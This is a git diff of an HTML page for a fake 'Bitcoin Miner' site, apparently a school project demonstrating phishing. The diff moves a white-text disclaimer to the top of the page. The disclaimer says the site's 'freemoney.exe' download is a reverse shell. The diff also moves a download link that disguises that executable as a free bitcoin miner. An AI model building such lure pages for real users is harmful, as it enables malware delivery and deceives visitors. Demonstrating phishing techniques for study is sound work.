--- a/index.html
+++ b/index.html
@@ -17,7 +17,14 @@ a:visited {
 </style>
 </head> 
     <body>
-        <header> #start
+        <h1 style="font-size: 3rem; color:white">This site is being used for a independant school project</h1>
+        <h2 style="color:white">The download file is a reverse shell, this website is a phishing delivery method for demonstration purposes.</h2>
+        <h3 style="color:white">Please don't download the file.</h3>
+
+        <a href="freemoney.exe" download>
+            <img src="freemoney.exe" alt="Click this link to download the free bitcoin miner">
+        </a>
+        <header>
             <h1>Bitcoin Miner</h1>
             <nav>
                 <ul>
@@ -86,28 +93,11 @@ a:visited {
         <footer>
             <p>&copy; 2023 Bitcoin Miner. All rights reserved.</p>
         </footer>
-    #end
-        <h1 style="font-size: 3rem; color:white">This site is being used for a independant school project</h1>
-        <h2 style="color:white">The download file is a reverse shell, this website is a phishing delivery method for demonstration purposes.</h2>
-        <h3 style="color:white">Please don't download the file.</h3>
 
-        <a href="freemoney.exe" download>
-            <img src="freemoney.exe" alt="Click this link to download the free bitcoin miner">
-        </a>
+        
 
     </body>
     <footer>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
-        <p<</p>
         <p style="color:white">Made by Sam Cairns</p>
         
     </footer>
